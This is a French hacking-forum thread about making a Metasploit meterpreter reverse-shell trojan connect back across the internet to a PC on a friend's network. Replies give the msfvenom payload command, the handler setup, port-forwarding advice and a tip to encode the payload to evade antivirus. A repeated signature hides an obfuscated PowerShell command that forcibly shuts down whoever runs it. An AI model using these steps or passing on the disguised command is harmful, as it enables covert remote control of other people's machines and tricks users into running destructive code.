Annonce

Réduire
Aucune annonce.

Besoin d'aide pour le Non-Local !

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Besoin d'aide pour le Non-Local !

    Bonjour,
    Je viens de commencer à apprendre le Hacking (sécurité) mais j'ai une question à laquelle personne n'a pu apporter de réponse !
    Pour effectuer une connection pretermeter en local c'est très simple, il existe beaucoup de tutoriaux sur le net comme par exemple celui qui consiste a taper la commande "# msfvenom -p windows/meterpreter/reverse_tcp — platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe" dans metasploit, ouvrir un handler sur le pc attaquant et ouvrir le trojan sur le PC à coté de nous.
    Mais comment faire si mon autre PC est chez un ami connecter a une Box internet ? Comment faire ?

  • #2
    Salut

    Je viens de commencer à apprendre le Hacking (sécurité)
    Tu aurais peut être du commencer par avoir des bases en TCP/IP.

    Tu cherches à faire du NAT/PAT.
    https://blog.nicolargo.com/2011/07/n...quoi-donc.html
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Oh merci pour le lien, je vais lire ça de se pas !

      Commentaire


      • #4
        D'accord très bien, j'ai compris la notion de NAT et PAT mais en pratique si j'ai tout bien compris in faudrait l'adresse ip publique et privée de la cible, je sais comment obtenir l'adresse ip publique mais comment faire pour obtenir l'adresse ip privée ? Et pour reprendre l'exemple l'exemple de base "# msfvenom -p windows/meterpreter/reverse_tcp — platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe" comment faire pour faire fonctionner ça ? Peut être mettre l'adresse ip et publique et privée de l'attaquant ici “attacker ip” les séparés a l'aide d'une virgule ou de quelque chose comme ça ?

        Commentaire


        • #5
          Tu n'a pas dû bien comprendre la notion de PAT car sinon tu saurais qu'il te suffit de mettre l'IP publique en ayant fait les bons réglages dans la box de ton ami.(Si c'est vraiment quelqu'un que tu connait )

          Commentaire


          • #6
            Salut a toi GeeFix et bienvenue =)

            Alors premiére chose assure toi d'avoir créer un payload avec
            ton adresse distante et non pas ton adresse local ca devrais marcher !

            Tu crée ton payload = msfvenum -p /windows/meterpreter/reverse_tcp LHOST='IPpublic' LPORT=4444 -f exe meterpreter.exe


            Donc il faut bien faire la difference entre ton adresse ip LOCAL qui n'est joingnable que depuit ton réseau local ex: 192.168.1.3 et ton ip distante qui elle est en réalité celle de ta box qui va router le flux vers ta machine et vice versa..
            Pour avoir ton adresse ip DISTANTE tu peu faire: curl ifconfig.me ( si tu n'a pas curl dirrectement dans ton navigateur a cette adresse: http://ifconfig.me )


            Il ce peu que tu soit bloquer par des regles de parfeu, ou par un antivirus..
            Pour palié a ce problem tu peu :

            - Encoder ton payload ( une ou plusieurs boucles )

            -Reconfigurer le parfeu

            - Tu auras peut étre aussi besoin de Gérer la NAT ( routage ) de ta box et de celle de ton "ami". Mais c'est pas sur..


            Si tu veut prendre la main sur la machine "totalement a distance" il faut que tu trouver un moyen d'upload ton payload sur la machine et de le faire s'executer,
            Mais vue que c'est "Ton autre PC" tu auras pas de prob pour ca je pensse


            Ps: oublier pas d'ouvrire le bon handler.. msfconsole > use exploit/multi/handler > set payload /windows/meterpreter/reverse_tcp
            Et de confing les bonne info avec > show options et set <optonAmodifier> <argument>


            Voilà j'espére avoir éclairer ta lanterne !
            Dernière modification par Unamed, 31 juillet 2017, 17h23.
            "Please do not use in military or secret service, or for illegal purposes."

            Commentaire


            • #7
              Tu auras peut étre aussi besoin de Gérer la NAT ( routage ) de ta box et de celle de ton "ami". Mais c'est pas sur..
              En fait si, c'est sûr. (Et NAT != routage)
              Si tu veux utiliser un reverse_shell comme le montre ton exemple, il te faudra NATer le port local que tu as choisi vers ton PC (Config sur ta box). (Pas besoin de toucher la box de ton ami, sauf si il filtre son trafic sortant, ce dont je doute si il a une conf standard).
              Hack like a pro :
              PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

              Commentaire


              • #8
                Je dit ca car je suis dériére un hotspot et tout mes payloads passe Krisscool ! Mais tu as surement raison depuit une box "Normal" il faut surement modifier le NAT

                Sais tu pourquoi d'ailleur?
                Ya pas une histoire que le routeur qui diffuse a tout les clients ou uniquement au client au quelle il son destiner ? ( les packets )
                "Please do not use in military or secret service, or for illegal purposes."

                Commentaire


                • #9
                  Imaginons qu'il y ai 10 PC sur ton réseau local derrière ta box. Ils auront une ip privée différente, mais une IP publique commune.
                  Si un PC distant tente de se connecter sur le port 4444 de cette IP publique commune, comment, a ton avis, la box pourrait'elle deviner que le paquet doit être redirigé vers le PC3 (sur lequel tu as ton listener) plutôt que vers le PC5 ?
                  Elle devinera pas, elle va simplement se fier aux règles de NAT qui indiqueront que toutes connexion entrante sur le port TCP 4444 doit être redirigées vers le PC3.

                  Pour rappel, un reverse_shell se monte depuis la cible quand elle exécute le payload. Il s'agira donc bien d'une connexion depuis la cible vers l'attaquant (connexion sortante du point de vue de la cible et entrante du point de vu de l'attaquant). (Ce qui explique d'ailleurs que c'est beaucoup plus utilisé au travers d'internet : pas besoin de NAT sur la cible + les FW filtrent plus souvent le trafic entrant que le trafic sortant).
                  Hack like a pro :
                  PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                  Commentaire

                  Chargement...
                  X